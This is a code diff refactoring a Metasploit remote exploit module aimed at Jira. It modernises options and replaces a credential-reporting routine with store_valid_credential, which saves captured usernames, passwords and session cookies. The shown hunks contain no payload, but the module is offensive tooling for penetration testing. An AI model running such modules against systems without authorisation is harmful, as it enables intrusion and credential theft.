@@ -1,9 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'json'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -69,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('JIRAUSER', [false, 'Jira Username', '']),
         OptString.new('JIRAPASS', [false, 'Jira Password', '']),
         OptString.new('TARGETURI', [true, 'The base to Jira', '/'])
-      ], self.class)
+      ])
   end
 
 
@@ -194,38 +193,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 
-  # Reports username and password to the database.
-  #
-  # @param opts [Hash]
-  # @option opts [String] :user
-  # @option opts [String] :password
-  #
-  # @return [void]
-  def report_cred(opts)
-    service_data = {
-      address: rhost,
-      port: rport,
-      service_name: ssl ? 'https' : 'http',
-      protocol: 'tcp',
-      workspace_id: myworkspace_id
-    }
-
-    credential_data = {
-      module_fullname: fullname,
-      post_reference_name: self.refname,
-      private_data: opts[:password],
-      origin_type: :service,
-      private_type: :password,
-      username: opts[:user]
-    }.merge(service_data)
-
-    login_data = {
-      core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
-      last_attempted_at: Time.now
-    }.merge(service_data)
-
-    create_credential_login(login_data)
+  def service_details
+      super.merge({ post_reference_name: self.refname })
   end
 
 
@@ -270,10 +239,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, 'Incorrect username or password')
     end
 
-    report_cred(
-      user: jira_username,
-      password: jira_password
-    )
+    store_valid_credential(user: jira_username, private: jira_password, proof: cookie) # expands to store cookie
 
     cookie
   end
@@ -639,5 +605,4 @@ class MetasploitModule < Msf::Exploit::Remote
   def print_error(msg='')
     super("#{peer} - #{msg}")
   end
-
 end
